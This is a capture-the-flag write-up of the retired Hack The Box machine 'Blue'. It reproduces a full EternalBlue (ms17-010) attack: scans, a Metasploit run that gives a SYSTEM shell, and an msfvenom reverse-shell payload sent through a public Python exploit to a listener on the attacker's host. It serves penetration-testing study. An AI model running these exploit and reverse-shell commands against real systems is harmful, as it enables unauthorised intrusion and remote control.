Hack the Box Blue
My write-up on HTB’s retired machine “Blue”
Disclaimer
This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.
There are probably many walk-through and write-ups about HTB’s Blue, however, this is my approach using Metasploit and manual exploitation techniques.
Reconnaissance
First, I will use nmapAutomator to automate the process of recon/enumeration
./nmapAutomator.sh 10.10.10.40 allBasic scan results:PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 56s, deviation: 1s, median: 56s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-02-12T02:16:33+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-12T02:16:36
|_ start_date: 2020-02-12T02:11:31
Vulnerability summary scan on all ports:PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open msrpc Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Enumeration
Ports and services that needed to be enumerated further:
- 135/tcp open msrpc Microsoft Windows RPC
- 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
- 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
Based on our nmap scan results, host is vulnerable to CVE-2017–0143 ms17–010.
Let’s now search possible exploits for ms17–010 using SearchSploit
#searchsploit ms17-010
Exploitation
First attempt using Metasploit module windows/smb/ms17_010_eternalblue
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf exploit(windows/smb/ms17_010_eternalblue) > optionsModule options (exploit/windows/smb/ms17_010_eternalblue):Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.40 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.Exploit target:Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packsmsf exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 10.10.14.42:4444
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.42:4444 -> 10.10.10.40:49160) at 2020-02-12 07:14:40 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=whoami
nt authority\systemC:\Windows\system32>
The results above illustrates that we have local admin privilege access.
Manual Exploitation
Try to exploit the host without using Metasploit.
Further research to manually exploit MS17–010 led me to https://github.com/helviojunior/MS17-010.git, exploits written in python. There are several files in this repository with explanation as to how the exploit works.
First let’s begin using checker.py script to find accessible named pipe on host 10.10.10.40
python checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
After running checker.py, the target host shows that it is not patched which is what we are looking for but we need to find accessible named pipes. To do accomplish this, we have to modify the script to give us access to named pipes. First let’s check by using ‘guest’ as username with null password to see if we it works.
After slight modification, checkper.py gave us accessible named pipes below.
python checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
Our next step is to utilize the send_and_execute.py exploit script and create our payload. ‘send_and_execute.py’ exploit use the same bug as eternalromance and eternalsynergy, however, access to named pipe is still needed.
Based on the results we have obtained running checker.py, slight modification is needed in send_and_execute.py.
Once modified, proceed on creating payload using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exeDescriptions of syntax and switches used to create ms17–010.exe
The -a flag specifies the architecture as 64-bit.
The — platform option sets the platform as Windows.
The -p flag specifies the payload.
LHOST is our local machine to connect back to.
LPORT is the local port to connect to.
The -e flag specifies the encoder to use.
The -f flag sets the format.
The -o flag specifies the output file.
The EXITFUNC=thread runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit)
Finally, on another terminal window, setup a netcat listener on port 443 and send the payload to the host using send_and_execute.py
python send_and_execute.py 10.10.10.40 ms17-010.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001cbd410
SESSION: 0xfffff8a001f0e820
FLINK: 0xfffff8a0029a9088
InParam: 0xfffff8a00929f15c
MID: 0x1306
unexpected alignment, diff: 0x-68f6f78
leak failed... try again
CONNECTION: 0xfffffa8001cbd410
SESSION: 0xfffff8a001f0e820
FLINK: 0xfffff8a0092b1088
InParam: 0xfffff8a0092ab15c
MID: 0x140b
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file L8W5CO.exe...
Opening SVCManager on 10.10.10.40.....
Creating service Esyf.....
Starting service Esyf.....
The NETBIOS connection with the remote host timed out.
Removing service Esyf.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of c:\Users\haris\Desktop24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 15,460,773,888 bytes freec:\Users\haris>dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is A0EF-1911Directory of C:\Users\Administrator\Desktop24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 15,460,773,888 bytes freec:\Users\haris>
VirusTotal
VT’s detection rate of the ms-17–010.exe payload that we have created and used to exploit the host.
Lessons Learned
- During the enumeration phase, understand not only the ports and services but also understand the system architecture.
- Using Metasploit is more convenient and a very powerful tool but for those of us preparing for OSCP, we have to learn without using it.
- As always, keep your systems up-to-date on patches.
References:
